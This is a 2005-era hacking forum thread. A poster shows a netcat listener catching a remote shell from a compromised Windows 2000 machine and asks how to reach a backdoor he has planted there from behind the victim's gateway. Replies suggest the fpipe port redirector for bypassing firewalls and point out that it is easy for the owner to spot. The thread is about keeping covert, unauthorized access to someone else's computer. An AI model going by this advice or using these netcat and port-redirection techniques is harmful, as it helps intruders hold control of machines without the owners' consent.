Partizaan
info - example:


E:\bonzaibuddy\NC141+TFTP>nc.exe -vv -L -p 141
listening on [any] 141 ...
Warning: forward host lookup failed for 75-666.666.76.dellhost.com: h_errno 1100
4: NO_DATA
connect to [696.696.11.156] from inet.box.dellhost.com [666.666.76.75] 2411:
NO_DATA
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Live:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 666.666.76.75
Subnet Mask . . . . . . . . . . . : 255.255.255.128
Default Gateway . . . . . . . . . : 666.666.76.1

C:\WINNT\system32>


How is it done? Here is the case!


You've got a remote shell (over the internet, not LAN) on box 666.666.76.75. You can execute commands through the netcat shell and upload files. However! Even though the files (e.g. a backdoor) are executed fine (you see them in tlist.exe), you can't connect to them because the box connects through a gateway, meaning a router or other node.

So, your file (backdoor) runs at port 69 BUT it is not forwarded on the gateway (666.666.76.1), which means you can't connect to your file (backdoor or FTP or so).

Now... you don't have a shell on the gateway, so you can't mess there.

I know there is a way around it (it has been done all the time); can somebody please explain how it is done?

Thanks in advance for the info.
SkitZZ
fpipe should do the trick

QUOTE
Command line port redirector for NT/2000. Now with UDP piping capability. Only port redirector we know of that can bind to a static port to bypass firewalls


http://www.foundstone.com/index.htm?subnav.../assessment.htm


SkitZZ
Partizaan
QUOTE(SkitZZ @ Feb 23 2005, 07:10 AM)
fpipe should do the trick

QUOTE
Command line port redirector for NT/2000. Now with UDP piping capability. Only port redirector we know of that can bind to a static port to bypass firewalls


http://www.foundstone.com/index.htm?subnav.../assessment.htm



Gonna check it out!
Thx, SkitZZ
White Scorpion
Try using fpipe on a system while it shouldn't be spotted... It keeps a command prompt open and it tells the system owner exactly which connections are made.

I'm writing a port redirector myself at the moment; when I finish it, it will be available on my site.
